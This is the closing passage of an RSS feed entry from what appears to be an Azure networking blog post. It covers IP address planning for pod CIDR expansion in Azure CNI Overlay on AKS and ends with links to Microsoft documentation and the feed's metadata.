&lt;LI&gt;Overlapping pod CIDRs across clusters – even though pod IPs are not directly routable between clusters, overlapping CIDRs can cause problems with observability tooling or cross-cluster networking on top of the overlay. Careful planning can prevent having to recreate the cluster down the road.&lt;/LI&gt;
&lt;LI&gt;Accounting for system node pools – each system node also consumes a /24 block. IP address planning should factor in nodes running cluster control plane components in addition to nodes running existing workloads.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Learn More&lt;/H2&gt;
&lt;P&gt;Read more about Azure CNI Overlay:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/aks/concepts-network-azure-cni-overlay" target="_blank" rel="noopener"&gt;Overview of Azure CNI Overlay Networking in Azure Kubernetes Service (AKS)&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Try pod CIDR expansion:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/aks/azure-cni-overlay-pod-expand" target="_blank" rel="noopener"&gt;Expand Pod CIDR Space in Azure CNI Overlay Azure Kubernetes Service (AKS) Clusters&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Fri, 05 Jun 2026 00:14:24 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-networking-blog/pod-cidr-expansion-generally-available-and-ip-address-planning/ba-p/4521700</guid>
      <dc:creator>Sam_Foo</dc:creator>
      <dc:date>2026-06-05T00:14:24Z</dc:date>
    </item>
  </channel>
</rss>

